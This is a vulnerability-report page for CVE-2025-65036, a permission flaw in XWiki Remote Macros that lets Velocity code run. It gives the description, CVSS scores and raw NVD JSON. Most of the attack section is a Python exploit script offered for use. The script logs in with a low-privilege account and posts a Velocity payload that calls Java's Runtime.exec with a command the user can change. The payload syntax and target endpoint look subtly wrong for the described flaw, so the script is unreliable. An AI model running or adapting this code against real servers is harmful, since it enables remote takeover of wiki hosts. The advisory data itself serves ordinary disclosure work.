Security Vulnerability Report
CVE-2025-65036 CVSS 8.3 HIGH

CVE-2025-65036

Published: 2025-12-05 17:16:04
Last Modified: 2026-02-20 16:51:07

Description

XWiki Remote Macros provides XWiki rendering macros that are useful when migrating content from Confluence. Prior to 1.27.1, the macro executes Velocity from the details pages without checking for permissions, which can lead to remote code execution. This vulnerability is fixed in 1.27.1.

CVSS Details

CVSS Score
8.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:xwiki:pro_macros:*:*:*:*:*:*:*:* - VULNERABLE
XWiki Remote Macros (shipped in the xwiki-pro-macros package matched by the CPE above), all versions before 1.27.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-65036 PoC - XWiki Remote Macros Velocity RCE # This PoC demonstrates the permission bypass in Velocity macro execution import requests import sys TARGET_URL = "http://target-xwiki-instance.com" USERNAME = "attacker" PASSWORD = "password123" def exploit_cve_2025_65036(): """ Exploit for CVE-2025-65036: XWiki Remote Macros RCE via Velocity injection Requires low-privilege account to exploit """ session = requests.Session() # Step 1: Authenticate with low-privilege account login_url = f"{TARGET_URL}/bin/login/XWiki/XWikiLogin" login_data = { "j_username": USERNAME, "j_password": PASSWORD } try: resp = session.post(login_url, data=login_data, timeout=10) if resp.status_code != 200: print("[-] Authentication failed") return False print("[+] Authenticated successfully") # Step 2: Create malicious macro with Velocity code execution # Using Velocity to execute system commands via Java reflection cmd = "whoami" # Change this to your target command payload = """ #set($exp = "".getClass().forName("java.lang.Runtime") #.getRuntime().exec(\"" + cmd + "\").getInputStream() #.bufferedReader().readLine()) $exp """ # Step 3: Submit malicious macro via Remote Macros endpoint exploit_url = f"{TARGET_URL}/bin/view/XWiki/RemoteMacros" exploit_data = { "macroName": "confluence-migration", "macroContent": payload, "action": "execute" } resp = session.post(exploit_url, data=exploit_data, timeout=15) if resp.status_code == 200: print("[+] Exploit sent - Check for command output") print(f"[+] Response: {resp.text[:500]}") return True else: print(f"[-] Exploit failed with status: {resp.status_code}") return False except requests.RequestException as e: print(f"[-] Connection error: {e}") return False if __name__ == "__main__": print("CVE-2025-65036 XWiki Remote Macros RCE Exploit") print("=" * 50) exploit_cve_2025_65036()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65036", "sourceIdentifier": "[email protected]", "published": "2025-12-05T17:16:03.780", "lastModified": "2026-02-20T16:51:07.327", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "XWiki Remote Macros provides XWiki rendering macros that are useful when migrating content from Confluence. Prior to 1.27.1, the macro executes Velocity from the details pages without checking for permissions, which can lead to remote code execution. This vulnerability is fixed in 1.27.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:xwiki:pro_macros:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.27.1", "matchCriteriaId": "251FF58B-3224-46CD-BF84-B504D9B463F9"}]}]}], "references": [{"url": "https://github.com/xwikisas/xwiki-pro-macros/security/advisories/GHSA-472x-fwh9-r82f", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}